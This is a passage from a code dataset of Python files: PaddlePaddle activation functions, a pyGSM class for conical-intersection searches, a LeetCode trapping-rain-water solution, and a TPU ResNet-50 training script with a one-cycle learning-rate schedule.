if dtype is None:
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'log_softmax')
else:
check_dtype(dtype, 'dtype', ['float32', 'float64'], 'log_softmax',
'If dtype is not None, it only support float32 or float64.')
helper = LayerHelper("log_softmax", **locals())
out_cast = x
if dtype is not None:
out_cast = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='cast',
inputs={'X': x},
outputs={'Out': out_cast},
attrs={'in_dtype': x.dtype,
'out_dtype': dtype})
out = helper.create_variable_for_type_inference(out_cast.dtype)
helper.append_op(
type='log_softmax',
inputs={'X': out_cast},
outputs={'Out': out},
attrs={'axis': axis})
return out
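# A minimal NumPy sketch of log_softmax as defined above, computed as a shifted log-sum-exp
# for numerical stability; illustrative only, not the Paddle kernel.
def _log_softmax_numpy_reference(x, axis=-1):
    import numpy as np
    x = np.asarray(x, dtype=np.float64)
    shifted = x - x.max(axis=axis, keepdims=True)
    return shifted - np.log(np.exp(shifted).sum(axis=axis, keepdims=True))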
def glu(x, axis=-1, name=None):
r"""
    The gated linear unit. The input is evenly split into two parts along a
    given axis. The first part is used as the content, and the second part is
    passed through a sigmoid function and then used as the gate. The output is an
    elementwise multiplication of the content and the gate.
.. math::
\mathrm{GLU}(a, b) = a \otimes \sigma(b)
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
axis (int, optional): The axis along which split the input tensor. It
should be in range [-D, D), where D is the dimensions of ``x`` .
If ``axis`` < 0, it works the same way as :math:`axis + D` .
Default is -1.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
        A Tensor with the same data type as x. The size of the given axis is
halved.
Examples:
.. code-block:: python
import paddle
from paddle.nn import functional as F
x = paddle.to_tensor(
[[-0.22014759, -1.76358426, 0.80566144, 0.04241343],
[-1.94900405, -1.89956081, 0.17134808, -1.11280477]]
)
print(F.glu(x).numpy())
# array([[-0.15216254, -0.9004892 ],
# [-1.0577879 , -0.46985325]], dtype=float32)
"""
check_variable_and_dtype(x, 'input', ['float16', 'float32', 'float64'],
"glu")
a, b = chunk(x, 2, axis=axis, name=name)
gate = sigmoid(b, name=name)
out = paddle.multiply(a, gate, name=name)
return out
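# A minimal NumPy sketch of the GLU above: split the input in half along `axis`, pass the
# second half through a sigmoid and use it to gate the first half; illustrative only.
def _glu_numpy_reference(x, axis=-1):
    import numpy as np
    x = np.asarray(x, dtype=np.float64)
    a, b = np.split(x, 2, axis=axis)
    return a * (1.0 / (1.0 + np.exp(-b)))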
def gumbel_softmax(x, temperature=1.0, hard=False, axis=-1, name=None):
r"""
Samples from the Gumbel-Softmax distribution and optionally discretizes.
temperature is denoted by t. The calculation process is as follows:
First, generate gumbel noise:
.. math::
G_i = -log(-log(U_i)), U_i \sim U(0,1)
Second, add noise to ``x``:
.. math::
v = [x_1 + G_1,...,x_n + G_n]
Finally, calculate gumbel_softmax and generate samples:
.. math::
gumbel\_softmax(v_i)=\frac{e^{v_i/t}}{\sum_{j=1}^n{e^{v_j/t}}},i=1,2,3...n
Parameters:
x (Tensor): An N-D Tensor, the first N - 1 dimensions index into a batch
of independent distributions and the last dimension represents
a vector of probabilities with datatype float32, float64.
temperature (float, optional): non-negative scalar temperature.
Default is 1.0.
hard (bool, optional): if True, the returned samples will be discretized as
one-hot vectors, but will be differentiated as if it is the soft sample
in autograd. Default is False.
        axis (int, optional): The axis along which the softmax value will be calculated.
Default is -1.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
Sampled tensor of same shape as ``x`` from the Gumbel-Softmax distribution.
If ``hard = True``, the returned samples will be one-hot, otherwise they will be
probability distributions that sum to 1 across ``axis``.
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
logits = paddle.randn([4, 6])
temperature = 0.01
gumbel_softmax = F.gumbel_softmax(logits, temperature)
print(gumbel_softmax)
# out's value is as follows:
# [[0.00000001, 1. , 0.00000000, 0.00000000, 0.00000006, 0.00000000],
# [0.00000000, 0.00000000, 0.00000000, 0.00000000, 0.00000000, 1. ],
# [0.00000062, 0.00000000, 0.00000000, 0.00000000, 0.00000000, 0.99999940],
# [0.00000000, 0.00000000, 0.00000000, 0.00001258, 0.99998736, 0.00000000]]
"""
if in_dynamic_mode():
return _C_ops.gumbel_softmax(x, 'temperature', temperature, 'hard',
hard, 'axis', axis)
helper = LayerHelper("gumbel_softmax", **locals())
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'gumbel_softmax')
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='gumbel_softmax',
inputs={'X': x},
outputs={'Out': out},
attrs={'temperature': temperature,
'hard': hard,
'axis': axis})
return out
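# A minimal NumPy sketch of the Gumbel-Softmax sampling steps described above (Gumbel noise,
# temperature-scaled softmax, optional hard one-hot). It ignores the straight-through gradient
# behaviour of the real op since NumPy has no autograd; illustrative only.
def _gumbel_softmax_numpy_reference(x, temperature=1.0, hard=False, axis=-1):
    import numpy as np
    x = np.asarray(x, dtype=np.float64)
    u = np.random.uniform(low=1e-10, high=1.0, size=x.shape)
    g = -np.log(-np.log(u))                      # Gumbel(0, 1) noise
    v = (x + g) / temperature
    v = v - v.max(axis=axis, keepdims=True)      # numerically stable softmax
    e = np.exp(v)
    y = e / e.sum(axis=axis, keepdims=True)
    if hard:
        one_hot = np.zeros_like(y)
        idx = np.expand_dims(y.argmax(axis=axis), axis)
        np.put_along_axis(one_hot, idx, 1.0, axis=axis)
        return one_hot
    return y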
| 33.768116
| 133
| 0.556828
|
794e267eeef55a48466cf579457b30cc905c49e3
| 6,256
|
py
|
Python
|
pygsm/growing_string_methods/se_cross.py
|
espottesmith/pyGSM
|
5bf263f9ef6cbee3ec16355c5eb1839446e704e7
|
[
"MIT"
] | null | null | null |
pygsm/growing_string_methods/se_cross.py
|
espottesmith/pyGSM
|
5bf263f9ef6cbee3ec16355c5eb1839446e704e7
|
[
"MIT"
] | null | null | null |
pygsm/growing_string_methods/se_cross.py
|
espottesmith/pyGSM
|
5bf263f9ef6cbee3ec16355c5eb1839446e704e7
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
# standard library imports
import sys
import os
from os import path
# third party
import numpy as np
# local application imports
sys.path.append(path.dirname( path.dirname( path.abspath(__file__))))
from utilities import *
from wrappers import Molecule
from .base_gsm import Base_Method
from .se_gsm import SE_GSM
from potential_energy_surfaces import Avg_PES
class SE_Cross(SE_GSM):
def go_gsm(self,max_iters=50,opt_steps=3,rtype=0):
"""rtype=0 MECI search
rtype=1 MESX search
"""
assert rtype in [0,1], "rtype not defined"
if rtype==0:
nifty.printcool("Doing SE-MECI search")
else:
nifty.printcool("Doing SE-MESX search")
self.nodes[0].gradrms=0.
self.nodes[0].V0 = self.nodes[0].energy
print(' Initial energy is {:1.4f}'.format(self.nodes[0].energy))
sys.stdout.flush()
# stash bdist for node 0
_,self.nodes[0].bdist = Base_Method.tangent(self.nodes[0],None,driving_coords=self.driving_coords)
print(" Initial bdist is %1.3f" %self.nodes[0].bdist)
# interpolate first node
self.add_GSM_nodeR()
# grow string
self.growth_iters(iters=max_iters,maxopt=opt_steps,nconstraints=1)
print(' SE_Cross growth phase over')
        print(' Warning: last node is still not fully optimized')
if True:
# doing extra constrained penalty optimization for MECI
print(" extra constrained optimization for the nnR-1 = %d" % (self.nR-1))
self.optimizer[self.nR-1].conv_grms=0.01
ictan,_ = Base_Method.tangent(self.nodes[self.nR-1],self.nodes[self.nR-2])
self.nodes[self.nR-1].PES.sigma=3.5
self.optimizer[self.nR-1].optimize(
molecule=self.nodes[self.nR-1],
refE=self.nodes[0].V0,
opt_type='ICTAN',
opt_steps=50,
ictan=ictan,
)
self.optimizer[self.nR].opt_cross=True
if rtype==0:
# MECI optimization
self.write_xyz_files(iters=1,base="after_penalty",nconstraints=1)
self.nodes[self.nR] = Molecule.copy_from_options(self.nodes[self.nR-1],new_node_id=self.nR)
self.nodes[self.nR].PES.lot.do_coupling=True
avg_pes = Avg_PES.create_pes_from(self.nodes[self.nR].PES)
self.nodes[self.nR].PES = avg_pes
self.optimizer[self.nR].conv_grms=self.options['CONV_TOL']
self.optimizer[self.nR].optimize(
molecule=self.nodes[self.nR],
refE=self.nodes[0].V0,
opt_type='MECI',
opt_steps=100,
)
self.write_xyz_files(iters=1,base="grown_string",nconstraints=1)
else:
# unconstrained penalty optimization
            # TODO make unconstrained "CROSSING" which checks for dE convergence
self.nodes[self.nR] = Molecule.copy_from_options(self.nodes[self.nR-1],new_node_id=self.nR)
self.nodes[self.nR].PES.sigma = 10.0
print(" sigma for node %d is %.3f" %(self.nR,self.nodes[self.nR].PES.sigma))
self.optimizer[self.nR].opt_cross=True
self.optimizer[self.nR].conv_grms=self.options['CONV_TOL']
self.optimizer[self.nR].optimize(
molecule=self.nodes[self.nR],
refE=self.nodes[0].V0,
opt_type='UNCONSTRAINED',
opt_steps=100,
)
self.write_xyz_files(iters=1,base="grown_string",nconstraints=1)
tmp = []
for n in range(self.nnodes):
tmp.append(self.energies[n])
self.energies = np.asarray(tmp)
def converged(self,n,opt_type):
if opt_type=="UNCSONTRAINED":
tmp1 = np.copy(self.nodes[n].PES.grad1)
tmp2 = np.copy(self.nodes[n].PES.grad2)
print('norm1: {:1.4f} norm2: {:1.4f}'.format(np.linalg.norm(tmp1),np.linalg.norm(tmp2)))
print('ratio: {:1.4f}'.format(np.linalg.norm(tmp1)/np.linalg.norm(tmp2)))
tmp1 = tmp1/np.linalg.norm(tmp1)
tmp2 = tmp2/np.linalg.norm(tmp2)
print('normalized gradient dot product:',float(np.dot(tmp1.T,tmp2)))
sys.stdout.flush()
if self.nodes[n].gradrms<self.options['CONV_TOL'] and 1.-abs(float(np.dot(tmp1.T,tmp2))) <= 0.02 and abs(self.nodes[n].PES.dE) <= 1.25:
return True
else:
return False
elif opt_type=="ICTAN": #constrained growth
if self.nodes[n].gradrms<self.optimizer[n].conv_grms:
return True
else:
return False
elif opt_type=="MECI":
if self.nodes[n].gradrms<self.options['CONV_TOL'] and abs(self.nodes[n].PES.dE) <= 1.0:
return True
else:
return False
def check_if_grown(self):
isDone = False
epsilon = 1.5
pes1dE = self.nodes[self.nR-1].PES.dE
pes2dE = self.nodes[self.nR-2].PES.dE
condition1 = (abs(self.nodes[self.nR-1].bdist) <=(1-self.BDIST_RATIO)*abs(self.nodes[0].bdist) and (abs(pes1dE) > abs(pes2dE)))
condition2= ((self.nodes[self.nR-1].bdist+0.1>self.nodes[self.nR-2].bdist) and (1-self.BDIST_RATIO)*abs(self.nodes[0].bdist))
if condition1:
print(" Condition 1 satisfied")
print(" bdist current %1.3f" % abs(self.nodes[self.nR-1].bdist))
print(" bdist target %1.3f" % (abs(self.nodes[0].bdist)*(1-self.BDIST_RATIO)))
print(" Growth-phase over")
isDone=True
#elif condition2:
# print(" Condition 2 satisfied")
# print(" Growth-phase over")
# isDone = True
return isDone
def restart_string(self,xyzfile='restart.xyz'):
super(SE_Cross,self).restart_string(xyzfile)
self.done_growing=False
self.nnodes=20
self.nR -=1
# stash bdist for node 0
_,self.nodes[0].bdist = Base_Method.tangent(self.nodes[0],None,driving_coords=self.driving_coords)
| 40.623377
| 147
| 0.585997
|
794e276fadef10163df8a726e8bcca57f0c8dfc8
| 438
|
py
|
Python
|
CONTENT/DS-n-Algos/ALGO/_LEETCODE/042_trapping_rain_water/42.py
|
impastasyndrome/DS-ALGO-OFFICIAL
|
c85ec9cf0af0009f038b7a571a7ac1fb466b7f3a
|
[
"Apache-2.0"
] | 13
|
2021-03-11T00:25:22.000Z
|
2022-03-19T00:19:23.000Z
|
CONTENT/DS-n-Algos/ALGO/_LEETCODE/042_trapping_rain_water/42.py
|
impastasyndrome/DS-ALGO-OFFICIAL
|
c85ec9cf0af0009f038b7a571a7ac1fb466b7f3a
|
[
"Apache-2.0"
] | 162
|
2021-03-09T01:52:11.000Z
|
2022-03-12T01:09:07.000Z
|
CONTENT/DS-n-Algos/ALGO/_LEETCODE/042_trapping_rain_water/42.py
|
impastasyndrome/DS-ALGO-OFFICIAL
|
c85ec9cf0af0009f038b7a571a7ac1fb466b7f3a
|
[
"Apache-2.0"
] | 12
|
2021-04-26T19:43:01.000Z
|
2022-01-31T08:36:29.000Z
|
class Solution:
def trap(self, height: "List[int]") -> "int":
result = 0
stack = []
for i in range(len(height)):
while stack and height[i] > height[stack[-1]]:
pre = stack.pop()
if stack:
h = min(height[stack[-1]], height[i])
result += (h - height[pre]) * (i - 1 - stack[-1])
stack.append(i)
return result
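# An alternative O(1)-space two-pointer formulation of the same problem, kept here only as an
# illustrative cross-check of the monotonic-stack solution above.
class SolutionTwoPointers:
    def trap(self, height: "List[int]") -> "int":
        left, right = 0, len(height) - 1
        left_max = right_max = result = 0
        while left < right:
            if height[left] < height[right]:
                # water above `left` is bounded by the best wall seen from the left
                left_max = max(left_max, height[left])
                result += left_max - height[left]
                left += 1
            else:
                right_max = max(right_max, height[right])
                result += right_max - height[right]
                right -= 1
        return result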
| 33.692308
| 69
| 0.440639
|
794e28503fcea03264b036cb01d22cdfbc53f4d8
| 32,394
|
py
|
Python
|
models/official/resnet/resnet_main_onecycle.py
|
henryqin1997/tpu
|
cf7f26bb3d2bdfa71652f0e216be35a2393ff7ef
|
[
"Apache-2.0"
] | null | null | null |
models/official/resnet/resnet_main_onecycle.py
|
henryqin1997/tpu
|
cf7f26bb3d2bdfa71652f0e216be35a2393ff7ef
|
[
"Apache-2.0"
] | null | null | null |
models/official/resnet/resnet_main_onecycle.py
|
henryqin1997/tpu
|
cf7f26bb3d2bdfa71652f0e216be35a2393ff7ef
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Train a ResNet-50 model on ImageNet on TPU."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import time
from absl import app
from absl import flags
from absl import logging
import numpy as np
import tensorflow.compat.v1 as tf
import tensorflow.compat.v2 as tf2
import myWeightedLoss
from common import inference_warmup
from common import tpu_profiler_hook
from hyperparameters import common_hparams_flags
from hyperparameters import common_tpu_flags
from hyperparameters import flags_to_params
from hyperparameters import params_dict
from official.resnet import imagenet_input
from official.resnet import lars_util_onecycle
from official.resnet import resnet_model
from official.resnet.configs import resnet_config
from official.resnet import onecycle
from tensorflow.core.protobuf import rewriter_config_pb2 # pylint: disable=g-direct-tensorflow-import
common_tpu_flags.define_common_tpu_flags()
common_hparams_flags.define_common_hparams_flags()
FLAGS = flags.FLAGS
FAKE_DATA_DIR = 'gs://cloud-tpu-test-datasets/fake_imagenet'
flags.DEFINE_integer(
'resnet_depth', default=None,
help=('Depth of ResNet model to use. Must be one of {18, 34, 50, 101, 152,'
' 200}. ResNet-18 and 34 use the pre-activation residual blocks'
' without bottleneck layers. The other models use pre-activation'
' bottleneck layers. Deeper models require more training time and'
' more memory and may require reducing --train_batch_size to prevent'
' running out of memory.'))
flags.DEFINE_integer(
'num_train_images', default=None, help='Size of training data set.')
flags.DEFINE_integer(
'num_eval_images', default=None, help='Size of evaluation data set.')
flags.DEFINE_integer(
'num_label_classes', default=None, help='Number of classes, at least 2')
flags.DEFINE_string(
'data_format', default=None,
help=('A flag to override the data format used in the model. The value'
' is either channels_first or channels_last. To run the network on'
' CPU or TPU, channels_last should be used. For GPU, channels_first'
' will improve performance.'))
flags.DEFINE_bool(
'transpose_input', default=None,
help='Use TPU double transpose optimization')
flags.DEFINE_bool(
'use_cache', default=None, help=('Enable cache for training input.'))
flags.DEFINE_integer('image_size', None, 'The input image size.')
flags.DEFINE_string(
'dropblock_groups', None,
help=('A string containing comma separated integers indicating ResNet '
'block groups to apply DropBlock. `3,4` means to apply DropBlock to '
'block groups 3 and 4. Use an empty string to not apply DropBlock to '
'any block group.'))
flags.DEFINE_float(
'dropblock_keep_prob', default=None,
help=('keep_prob parameter of DropBlock. Will not be used if '
'dropblock_groups is empty.'))
flags.DEFINE_integer(
'dropblock_size', default=None,
help=('size parameter of DropBlock. Will not be used if dropblock_groups '
'is empty.'))
flags.DEFINE_boolean(
'pre_activation', default=None,
help=('Whether to use pre-activation ResNet (ResNet-v2)'))
flags.DEFINE_string(
'norm_act_layer', default=None,
help='One of {"bn_relu", "evonorm_b0", "evonorm_s0"}.')
flags.DEFINE_integer(
'profile_every_n_steps', default=0,
help=('Number of steps between collecting profiles if larger than 0'))
flags.DEFINE_string(
'mode', default='train_and_eval',
help='One of {"train_and_eval", "train", "eval"}.')
flags.DEFINE_integer(
'steps_per_eval', default=1251,
help=('Controls how often evaluation is performed. Since evaluation is'
' fairly expensive, it is advised to evaluate as infrequently as'
' possible (i.e. up to --train_steps, which evaluates the model only'
' after finishing the entire training regime).'))
flags.DEFINE_integer(
'eval_timeout',
default=None,
help='Maximum seconds between checkpoints before evaluation terminates.')
flags.DEFINE_integer(
'num_parallel_calls', default=None,
help=('Number of parallel threads in CPU for the input pipeline.'
' Recommended value is the number of cores per CPU host.'))
flags.DEFINE_integer(
'num_cores', default=None,
help=('Number of TPU cores in total. For a single TPU device, this is 8'
' because each TPU has 4 chips each with 2 cores.'))
flags.DEFINE_string(
'bigtable_project', None,
'The Cloud Bigtable project. If None, --gcp_project will be used.')
flags.DEFINE_string(
'bigtable_instance', None,
'The Cloud Bigtable instance to load data from.')
flags.DEFINE_string(
'bigtable_table', 'imagenet',
'The Cloud Bigtable table to load data from.')
flags.DEFINE_string(
'bigtable_train_prefix', 'train_',
'The prefix identifying training rows.')
flags.DEFINE_string(
'bigtable_eval_prefix', 'validation_',
'The prefix identifying evaluation rows.')
flags.DEFINE_string(
'bigtable_column_family', 'tfexample',
'The column family storing TFExamples.')
flags.DEFINE_string(
'bigtable_column_qualifier', 'example',
'The column name storing TFExamples.')
flags.DEFINE_string(
'export_dir',
default=None,
help=('The directory where the exported SavedModel will be stored.'))
flags.DEFINE_bool(
'export_to_tpu', default=False,
help=('Whether to export additional metagraph with "serve, tpu" tags'
' in addition to "serve" only metagraph.'))
flags.DEFINE_float(
'base_learning_rate', default=None,
help=('Base learning rate when train batch size is 256.'))
flags.DEFINE_float(
'momentum', default=None,
help=('Momentum parameter used in the MomentumOptimizer.'))
flags.DEFINE_float(
'weight_decay', default=None,
    help=('Weight decay coefficient for L2 regularization.'))
flags.DEFINE_float(
'label_smoothing', default=None,
help=('Label smoothing parameter used in the softmax_cross_entropy'))
flags.DEFINE_bool('enable_lars',
default=None,
help=('Enable LARS optimizer for large batch training.'))
flags.DEFINE_float('poly_rate', default=None,
help=('Set LARS/Poly learning rate.'))
flags.DEFINE_bool(
'use_async_checkpointing', default=None, help=('Enable async checkpoint'))
flags.DEFINE_integer('log_step_count_steps', 64, 'The number of steps at '
'which the global step information is logged.')
flags.DEFINE_string(
'augment_name', default=None,
    help='`string` that is the name of the augmentation method '
    'to apply to the image. `autoaugment` if AutoAugment is to be used or '
    '`randaugment` if RandAugment is to be used. If the value is `None` no '
    'augmentation method will be applied. See autoaugment.py for '
'more details.')
flags.DEFINE_integer(
'randaug_num_layers', default=None,
    help='If RandAug is used, what should the number of layers be. '
'See autoaugment.py for detailed description.')
flags.DEFINE_integer(
'randaug_magnitude', default=None,
help='If RandAug is used, what should the magnitude be. '
'See autoaugment.py for detailed description.')
# Inference configuration.
flags.DEFINE_bool(
'add_warmup_requests', False,
'Whether to add warmup requests into the export saved model dir,'
'especially for TPU inference.')
flags.DEFINE_string('model_name', 'resnet',
'Serving model name used for the model server.')
flags.DEFINE_multi_integer(
'inference_batch_sizes', [8],
'Known inference batch sizes used to warm up for each core.')
# The canonical ImageNet mean/std constants are defined for inputs in [0, 1]; since the
# input tensor here is in the range [0, 255], the constants below are scaled by 255 to match.
MEAN_RGB = [0.485 * 255, 0.456 * 255, 0.406 * 255]
STDDEV_RGB = [0.229 * 255, 0.224 * 255, 0.225 * 255]
losslog = []
# def get_lr_schedule(train_steps, num_train_images, train_batch_size):
# """learning rate schedule."""
# steps_per_epoch = np.floor(num_train_images / train_batch_size)
# train_epochs = train_steps / steps_per_epoch
# return [ # (multiplier, epoch to start) tuples
# (1.0, np.floor(5 / 90 * train_epochs)),
# (0.1, np.floor(30 / 90 * train_epochs)),
# (0.01, np.floor(60 / 90 * train_epochs)),
# (0.001, np.floor(80 / 90 * train_epochs))
# ]
#
#
# def learning_rate_schedule(params, current_epoch):
# """Handles linear scaling rule, gradual warmup, and LR decay.
#
# The learning rate starts at 0, then it increases linearly per step.
# After 5 epochs we reach the base learning rate (scaled to account
# for batch size).
# After 30, 60 and 80 epochs the learning rate is divided by 10.
# After 90 epochs training stops and the LR is set to 0. This ensures
# that we train for exactly 90 epochs for reproducibility.
#
# Args:
# params: Python dict containing parameters for this run.
# current_epoch: `Tensor` for current epoch.
#
# Returns:
# A scaled `Tensor` for current learning rate.
# """
# scaled_lr = params['base_learning_rate'] * (
# params['train_batch_size'] / 256.0)
#
# lr_schedule = get_lr_schedule(
# train_steps=params['train_steps'],
# num_train_images=params['num_train_images'],
# train_batch_size=params['train_batch_size'])
# decay_rate = (scaled_lr * lr_schedule[0][0] *
# current_epoch / lr_schedule[0][1])
# for mult, start_epoch in lr_schedule:
# decay_rate = tf.where(current_epoch < start_epoch,
# decay_rate, scaled_lr * mult)
# return decay_rate
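# Illustrative sketch only: a linear one-cycle learning-rate/momentum schedule in the spirit of
# the OneCycleScheduler used below. The real scheduler lives in official.resnet.onecycle and is
# not reproduced here; the peak value, warmup fraction and momentum range below are assumptions
# for illustration, not the values used in training.
def _one_cycle_sketch(step, total_steps, max_lr=25.0, warmup_frac=0.3,
                      min_mom=0.85, max_mom=0.95):
  warmup_steps = max(1.0, warmup_frac * total_steps)
  if step < warmup_steps:
    frac = step / warmup_steps                                   # linear ramp up
  else:
    frac = 1.0 - (step - warmup_steps) / max(1.0, total_steps - warmup_steps)
  lr = max_lr * frac
  momentum = max_mom - (max_mom - min_mom) * frac                # momentum moves opposite to lr
  return lr, momentum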
def resnet_model_fn(features, labels, mode, params):
"""The model_fn for ResNet to be used with TPUEstimator.
Args:
features: `Tensor` of batched images. If transpose_input is enabled, it
is transposed to device layout and reshaped to 1D tensor.
labels: `Tensor` of labels for the data samples
mode: one of `tf.estimator.ModeKeys.{TRAIN,EVAL,PREDICT}`
params: `dict` of parameters passed to the model from the TPUEstimator,
`params['batch_size']` is always provided and should be used as the
effective batch size.
Returns:
A `TPUEstimatorSpec` for the model
"""
if isinstance(features, dict):
features = features['feature']
# In most cases, the default data format NCHW instead of NHWC should be
# used for a significant performance boost on GPU/TPU. NHWC should be used
# only if the network needs to be run on CPU since the pooling operations
# are only supported on NHWC.
if params['data_format'] == 'channels_first':
assert not params['transpose_input'] # channels_first only for GPU
features = tf.transpose(features, [0, 3, 1, 2])
if params['transpose_input'] and mode != tf.estimator.ModeKeys.PREDICT:
image_size = tf.sqrt(tf.shape(features)[0] / (3 * tf.shape(labels)[0]))
features = tf.reshape(features, [image_size, image_size, 3, -1])
features = tf.transpose(features, [3, 0, 1, 2]) # HWCN to NHWC
# Normalize the image to zero mean and unit variance.
features -= tf.constant(MEAN_RGB, shape=[1, 1, 3], dtype=features.dtype)
features /= tf.constant(STDDEV_RGB, shape=[1, 1, 3], dtype=features.dtype)
# DropBlock keep_prob for the 4 block groups of ResNet architecture.
# None means applying no DropBlock at the corresponding block group.
dropblock_keep_probs = [None] * 4
if params['dropblock_groups']:
# Scheduled keep_prob for DropBlock.
train_steps = tf.cast(params['train_steps'], tf.float32)
current_step = tf.cast(tf.train.get_global_step(), tf.float32)
current_ratio = current_step / train_steps
dropblock_keep_prob = (1 - current_ratio * (
1 - params['dropblock_keep_prob']))
# Computes DropBlock keep_prob for different block groups of ResNet.
dropblock_groups = [int(x) for x in params['dropblock_groups'].split(',')]
for block_group in dropblock_groups:
if block_group < 1 or block_group > 4:
raise ValueError(
'dropblock_groups should be a comma separated list of integers '
            'between 1 and 4 (dropblock_groups: {}).'
.format(params['dropblock_groups']))
dropblock_keep_probs[block_group - 1] = 1 - (
(1 - dropblock_keep_prob) / 4.0**(4 - block_group))
# This nested function allows us to avoid duplicating the logic which
# builds the network, for different values of --precision.
def build_network():
network = resnet_model.resnet(
resnet_depth=params['resnet_depth'],
num_classes=params['num_label_classes'],
dropblock_size=params['dropblock_size'],
dropblock_keep_probs=dropblock_keep_probs,
pre_activation=params['pre_activation'],
norm_act_layer=params['norm_act_layer'],
data_format=params['data_format'])
return network(
inputs=features, is_training=(mode == tf.estimator.ModeKeys.TRAIN))
if params['precision'] == 'bfloat16':
with tf.tpu.bfloat16_scope():
logits = build_network()
logits = tf.cast(logits, tf.float32)
elif params['precision'] == 'float32':
logits = build_network()
if mode == tf.estimator.ModeKeys.PREDICT:
predictions = {
'classes': tf.argmax(logits, axis=1),
'probabilities': tf.nn.softmax(logits, name='softmax_tensor')
}
return tf.estimator.EstimatorSpec(
mode=mode,
predictions=predictions,
export_outputs={
'classify': tf.estimator.export.PredictOutput(predictions)
})
  # If necessary, in the model_fn, use params['batch_size'] instead of the batch
# size flags (--train_batch_size or --eval_batch_size).
batch_size = params['batch_size'] # pylint: disable=unused-variable
# Calculate loss, which includes softmax cross entropy and L2 regularization.
one_hot_labels = tf.one_hot(labels, params['num_label_classes'])
# cross_entropy = tf.losses.softmax_cross_entropy(
# logits=logits,
# onehot_labels=one_hot_labels,
# label_smoothing=params['label_smoothing'])
cross_entropy = myWeightedLoss.softmax_cross_entropy(
logits=logits,
onehot_labels=one_hot_labels,
label_smoothing=params['label_smoothing'])
# Add weight decay to the loss for non-batch-normalization variables.
if params['enable_lars']:
loss = cross_entropy
else:
loss = cross_entropy + params['weight_decay'] * tf.add_n([
tf.nn.l2_loss(v)
for v in tf.trainable_variables()
if 'batch_normalization' not in v.name and 'evonorm' not in v.name
])
host_call = None
if mode == tf.estimator.ModeKeys.TRAIN:
# Compute the current epoch and associated learning rate from global_step.
global_step = tf.train.get_global_step()
steps_per_epoch = params['num_train_images'] / params['train_batch_size']
current_epoch = (tf.cast(global_step, tf.float32) /
steps_per_epoch)
# LARS is a large-batch optimizer: it makes it possible to retain accuracy at
# batch sizes of 16K and larger.
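# Roughly, LARS scales each layer's learning rate by a trust ratio
# eta * ||w|| / (||grad|| + weight_decay * ||w||), so layers whose gradients
# are small relative to their weights still take reasonably sized steps.
# The exact form used here lives in lars_util_onecycle.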
if params['enable_lars']:
onecycle_sche = onecycle.OneCycleScheduler(tf.constant(25., dtype=tf.float32), params['train_steps'])
learning_rate, momen = onecycle_sche.getlrmom(tf.cast(global_step, dtype=tf.float32))
optimizer = lars_util_onecycle.init_lars_optimizer(current_epoch, params,learning_rate)
else:
# learning_rate = learning_rate_schedule(params, current_epoch)
#for lr range test
# learning_rate = onecycle.lrs(tf.cast(global_step,tf.float32),params['train_steps'])
#for onecycle scheduler
onecycle_sche = onecycle.OneCycleScheduler(tf.constant(5.,dtype=tf.float32),params['train_steps'])
learning_rate,momen = onecycle_sche.getlrmom(tf.cast(global_step,dtype=tf.float32))
optimizer = tf.train.MomentumOptimizer(
learning_rate=learning_rate,
# momentum=params['momentum'],
momentum=momen,
use_nesterov=True)
if params['use_tpu']:
# When using TPU, wrap the optimizer with CrossShardOptimizer which
# handles synchronization details between different TPU cores. To the
# user, this should look like regular synchronous training.
optimizer = tf.tpu.CrossShardOptimizer(optimizer)
# Batch normalization requires UPDATE_OPS to be added as a dependency to
# the train operation.
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_op = optimizer.minimize(loss, global_step)
if not params['skip_host_call']:
def host_call_fn(gs, loss, lr, ce):
"""Training host call. Creates scalar summaries for training metrics.
This function is executed on the CPU and should not directly reference
any Tensors in the rest of the `model_fn`. To pass Tensors from the
model to the `metric_fn`, provide as part of the `host_call`. See
https://www.tensorflow.org/api_docs/python/tf/estimator/tpu/TPUEstimatorSpec
for more information.
Arguments should match the list of `Tensor` objects passed as the second
element in the tuple passed to `host_call`.
Args:
gs: `Tensor` with shape `[batch]` for the global_step.
loss: `Tensor` with shape `[batch]` for the training loss.
lr: `Tensor` with shape `[batch]` for the learning_rate.
ce: `Tensor` with shape `[batch]` for the current_epoch.
Returns:
List of summary ops to run on the CPU host.
"""
gs = gs[0]
# Host call fns are executed params['iterations_per_loop'] times after
# one TPU loop is finished; setting the max_queue value to the number of
# iterations makes the summary writer flush the data to storage only once
# per loop.
with tf2.summary.create_file_writer(
FLAGS.model_dir,
max_queue=params['iterations_per_loop']
# max_queue=10
).as_default():
with tf2.summary.record_if(True):
# gs_unpacked = tf.unstack(gs)
# for i, g in enumerate(gs_unpacked):
# tf2.summary.scalar('loss', loss[i], step=g)
# tf2.summary.scalar('learning_rate', lr[i], step=g)
# tf2.summary.scalar('current_epoch', ce[i], step=g)
tf2.summary.scalar('loss', loss[0], step=gs)
tf2.summary.scalar('learning_rate', lr[0], step=gs)
tf2.summary.scalar('current_epoch', ce[0], step=gs)
return tf.summary.all_v2_summary_ops()
# To log the loss, current learning rate, and epoch for Tensorboard, the
# summary op needs to be run on the host CPU via host_call. host_call
# expects [batch_size, ...] Tensors, thus reshape to introduce a batch
# dimension. These Tensors are implicitly concatenated to
# [params['batch_size']].
gs_t = tf.reshape(global_step, [1])
loss_t = tf.reshape(loss, [1])
lr_t = tf.reshape(learning_rate, [1])
ce_t = tf.reshape(current_epoch, [1])
